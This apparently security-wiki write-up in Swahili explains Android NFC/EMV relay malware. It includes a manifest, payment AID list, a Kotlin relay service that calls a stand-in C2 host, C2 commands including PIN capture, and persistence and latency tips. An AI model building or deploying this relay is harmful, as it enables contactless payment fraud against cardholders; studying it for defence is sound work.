Android HCE NFC/EMV Relay Attacks

Reading time: 6 minutes

Muhtasari

Matumizi mabaya ya Android Host Card Emulation (HCE) yanaruhusu app yenye nia mbaya iliyowekwa kama default NFC payment service kupitisha miamala ya EMV contactless kwa wakati halisi. Terminal ya POS huwasiliana kwa ISO 14443-4/EMV na simu; HostApduService ya app inapokea APDUs na kuzipeleka kupitia C2 ya pande mbili (mara nyingi WebSocket) kwenda backend inayotengeneza majibu, ambayo yanarudishwa kwenye POS. Hii inawawezesha kufanya live card emulation bila data za kadi zilizo ndani ya kifaa. Kampeni zilizoshuhudiwa kwa wingi hujiweka kama maombi ya benki/serikali, zinahamasisha kuwa default payment app, na ku-auto-exfiltrate data za kifaa/kadi kwenda Telegram bots/channels.

Sifa muhimu

• Android components: HostApduService + default NFC payment handler (category "payment")
• Transport/C2: WebSocket for APDU relay; Telegram bot API for exfil/ops
• Operator workflow: structured commands (login, register_device, apdu_command/apdu_response, get_pin/pin_response, paired, check_status, update_required, telegram_notification, error)
• Roles: scanner (read EMV data) vs tapper (HCE/relay) builds

Vitu vya msingi vya utekelezaji

Manifest (kuwa default payment HCE service)

<uses-feature android:name="android.hardware.nfc.hce" android:required="true"/>
<uses-permission android:name="android.permission.NFC"/>

<application ...>
<service
android:name=".EmvRelayService"
android:exported="true"
android:permission="android.permission.BIND_NFC_SERVICE">
<intent-filter>
<action android:name="android.nfc.cardemulation.action.HOST_APDU_SERVICE"/>
</intent-filter>
<meta-data
android:name="android.nfc.cardemulation.host_apdu_service"
android:resource="@xml/aid_list"/>
</service>
</application>

Orodha ya mfano ya AID ya kategoria ya malipo za EMV (ni programu tu zilizowekwa kama malipo ya chaguo-msingi zinaweza kujibu AID hizi):

<?xml version="1.0" encoding="utf-8"?>
<host-apdu-service xmlns:android="http://schemas.android.com/apk/res/android"
android:description="@string/app_name"
android:requireDeviceUnlock="false">
<aid-group android:category="payment" android:description="@string/app_name">
<!-- PPSE (2PAY.SYS.DDF01) routing -->
<aid-filter android:name="325041592E5359532E4444463031"/>
<!-- Common EMV AIDs (examples): -->
<aid-filter android:name="A0000000031010"/> <!-- VISA credit/debit -->
<aid-filter android:name="A0000000041010"/> <!-- MasterCard -->
<aid-filter android:name="A00000002501"/>   <!-- AmEx -->
</aid-group>
</host-apdu-service>

Waulize mtumiaji kuweka programu ya malipo ya chaguo-msingi (hufungua mipangilio ya OS):

val intent = Intent("android.settings.NFC_PAYMENT_SETTINGS")
startActivity(intent)

HostApduService relay muundo

class EmvRelayService : HostApduService() {
private var ws: okhttp3.WebSocket? = null

override fun onCreate() {
super.onCreate()
// Establish C2 WebSocket early; authenticate and register device
val client = okhttp3.OkHttpClient()
val req = okhttp3.Request.Builder().url("wss://c2.example/ws").build()
ws = client.newWebSocket(req, object : okhttp3.WebSocketListener() {})
}

override fun processCommandApdu(commandApdu: ByteArray?, extras: Bundle?): ByteArray {
// Marshal APDU to C2 and block until response
val id = System.nanoTime()
val msg = mapOf(
"type" to "apdu_command",
"id" to id,
"data" to commandApdu!!.toHex()
)
val response = sendAndAwait(msg) // wait for matching apdu_response{id}
return response.hexToBytes()
}

override fun onDeactivated(reason: Int) {
ws?.send("{\"type\":\"card_removed\"}")
}

private fun sendAndAwait(m: Any): String {
// Implement correlation + timeout; handle error/blocked status
// ...
return "9000" // fall back to SW success if needed
}
}

Kumbuka ya matumizi: Background service lazima itoe majibu ndani ya bajeti ya timeout ya POS (~mili-sekunde chache mia) kwa kila APDU; tumia socket yenye latency ya chini na pre-auth na C2. Dumu hata pale mchakato ukifariki kwa kutumia foreground service inapohitajika.

Seti ya kawaida ya amri za C2 (zilizoonekana)

login / login_response
register / register_device / register_response
logout
apdu_command / apdu_response
card_info / clear_card_info / card_removed
get_pin / pin_response
check_status / status_response
paired / unpaired
update_required
telegram_notification / telegram_response
error

EMV contactless exchange (mwongozo wa msingi)

POS inadhibiti mtiririko; app ya HCE inapitia tu APDUs:

• SELECT PPSE (2PAY.SYS.DDF01)
• 00 A4 04 00 0E 32 50 41 59 2E 53 59 53 2E 44 44 46 30 31 00
• SELECT application AID (e.g., VISA A0000000031010)
• 00 A4 04 00 len 00
• GET PROCESSING OPTIONS (GPO)
• 80 A8 00 00 Lc 00
• READ RECORD(S) per AFL
• 00 B2 <SFI/record> 0C 00
• GENERATE AC (ARQC/TC)
• 80 AE 80 00 Lc 00

Katika relay, backend hutengeneza FCI/FCP, AFL, rekodi na cryptogram sahihi; simu inapita tu bytes.

Mikondo ya kazi ya mwendeshaji yaliyoshuhudiwa kwa vitendo

• Udanganyifu + ufungaji: app inajipaka rangi/kubadilisha kuwa portal ya benki/serikali, inaonyesha WebView ya skrini nzima na mara moja inaomba kuwa app ya malipo ya NFC ya chaguo-msingi.
• Uamilishaji utokanao na tukio: NFC tap inamsha HostApduService; relay inaanza.
• Majukumu ya Scanner/Tapper: build moja husoma data za EMV kutoka kwa kadi ya mwathiri (PAN, exp, tracks, device/EMV fields) na kuzitoa nje; build nyingine (au kifaa hicho hicho baadaye) hufanya HCE relay kwa POS.
• Exfiltration: data za kifaa/kadi zinachapishwa moja kwa moja kwenye chaneli/bots binafsi za Telegram; WebSocket inaendesha vikao na mwito wa UI (mfano, UI ya PIN kwenye kifaa).

Marejeo

• Zimperium – Tap-and-Steal: The Rise of NFC Relay Malware on Mobile Devices
• Android HostApduService
• Android HCE and Card Emulation docs
• Zimperium IOCs – 2025-10-NFCStealer